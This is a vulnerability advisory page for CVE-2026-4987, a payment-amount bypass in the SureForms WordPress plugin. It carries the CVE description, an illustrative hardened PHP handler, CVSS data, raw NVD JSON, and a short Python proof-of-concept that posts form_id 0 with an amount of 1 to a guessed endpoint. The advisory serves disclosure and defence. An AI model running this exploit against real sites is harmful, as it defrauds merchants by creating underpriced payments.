Security Vulnerability Report
CVE-2026-4987 CVSS 7.5 HIGH

Published: 2026-03-28 02:16:15
Last Modified: 2026-04-24 16:36:24

Description

The SureForms – Contact Form, Payment Form & Other Custom Form Builder plugin for WordPress is vulnerable to Payment Amount Bypass in all versions up to, and including, 2.5.2. This is due to the create_payment_intent() function performing a payment validation solely based on the value of a user-controlled parameter. This makes it possible for unauthenticated attackers to bypass configured form payment-amount validation and create underpriced payment/subscription intents by setting form_id to 0.
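
The fix that this description implies is to derive the charge from server-side form configuration and to refuse any form_id that does not resolve to a configured payment form, so that a zero or unknown form_id can never fall through to a client-chosen amount. The handler below is an added illustration in WordPress PHP, not SureForms code: the route, the `payment_amount` meta key, the `example_gateway_create_intent()` wrapper and the use of minor currency units are all assumptions.

```php
<?php
// Hypothetical hardened payment-intent handler (example code, not the plugin's).
// Assumed: price lives in post meta 'payment_amount' in minor units (cents).
function example_create_payment_intent( WP_REST_Request $request ) {
    // absint() maps missing, negative or non-numeric input to 0.
    $form_id = absint( $request->get_param( 'form_id' ) );

    // 0 is never a valid post ID; reject it before any lookup instead of
    // letting a falsy form_id mean "no form configured, trust the request".
    if ( 0 === $form_id || null === get_post( $form_id ) ) {
        return new WP_Error( 'example_invalid_form', 'Unknown form.', array( 'status' => 400 ) );
    }

    // The amount comes only from server-side configuration (assumed meta key).
    // A form with no configured price must not be chargeable at all.
    $stored = get_post_meta( $form_id, 'payment_amount', true );
    if ( '' === $stored || ! ctype_digit( (string) $stored ) || (int) $stored <= 0 ) {
        return new WP_Error( 'example_no_price', 'Form has no configured price.', array( 'status' => 400 ) );
    }
    $amount = (int) $stored;

    // Any amount the client sends is ignored for pricing; a mismatch with the
    // configured value is logged as a tampering signal for detection.
    $claimed = $request->get_param( 'amount' );
    if ( null !== $claimed && (int) $claimed !== $amount ) {
        error_log( sprintf( 'example: amount mismatch form=%d client=%s server=%d',
            $form_id, (string) $claimed, $amount ) );
    }

    $intent = example_gateway_create_intent( $amount, 'usd' ); // assumed gateway wrapper
    return rest_ensure_response( array(
        'amount'        => $amount,
        'client_secret' => $intent['client_secret'],
    ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'example-forms/v1', '/payment-intent', array(
        'methods'             => 'POST',
        'callback'            => 'example_create_payment_intent',
        // Unauthenticated by design, which is exactly why the amount must be server-derived.
        'permission_callback' => '__return_true',
    ) );
} );
```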

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

SureForms <= 2.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit_payment_bypass(target_url):
    """
    PoC for CVE-2026-4987
    Demonstrates bypassing payment validation by setting form_id to 0.
    """
    # The vulnerable endpoint might vary, this is a generic example based on the description
    endpoint = f"{target_url}/wp-json/sureforms/v1/payment_intent"
    headers = {
        "Content-Type": "application/json"
    }
    # Malicious payload setting form_id to 0
    payload = {
        "form_id": 0,
        "amount": 1,  # Attempting to pay minimal amount
        "currency": "USD"
    }
    try:
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Potential bypass successful!")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    target = "http://example.com"  # Replace with target
    exploit_payment_bypass(target)
```

References

Weakness: CWE-20 (Improper Input Validation)
https://plugins.trac.wordpress.org/changeset/3488858/sureforms
https://www.wordfence.com/threat-intel/vulnerabilities/id/c4772b32-a730-44f2-b43c-f9bd5abb6541?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-4987",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-28T02:16:14.793",
    "lastModified": "2026-04-24T16:36:24.067",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The SureForms – Contact Form, Payment Form & Other Custom Form Builder plugin for WordPress is vulnerable to Payment Amount Bypass in all versions up to, and including, 2.5.2. This is due to the create_payment_intent() function performing a payment validation solely based on the value of a user-controlled parameter. This makes it possible for unauthenticated attackers to bypass configured form payment-amount validation and create underpriced payment/subscription intents by setting form_id to 0."
      },
      {
        "lang": "es",
        "value": "El plugin SureForms – Contact Form, Payment Form &amp; Other Custom Form Builder para WordPress es vulnerable a la Omisión de Cantidad de Pago en todas las versiones hasta la 2.5.2, inclusive. Esto se debe a que la función create_payment_intent() realiza una validación de pago únicamente basada en el valor de un parámetro controlado por el usuario. Esto hace posible que atacantes no autenticados omitan la validación de cantidad de pago del formulario configurada y creen intenciones de pago/suscripción con precios reducidos al establecer form_id en 0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-20"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3488858/sureforms",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c4772b32-a730-44f2-b43c-f9bd5abb6541?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```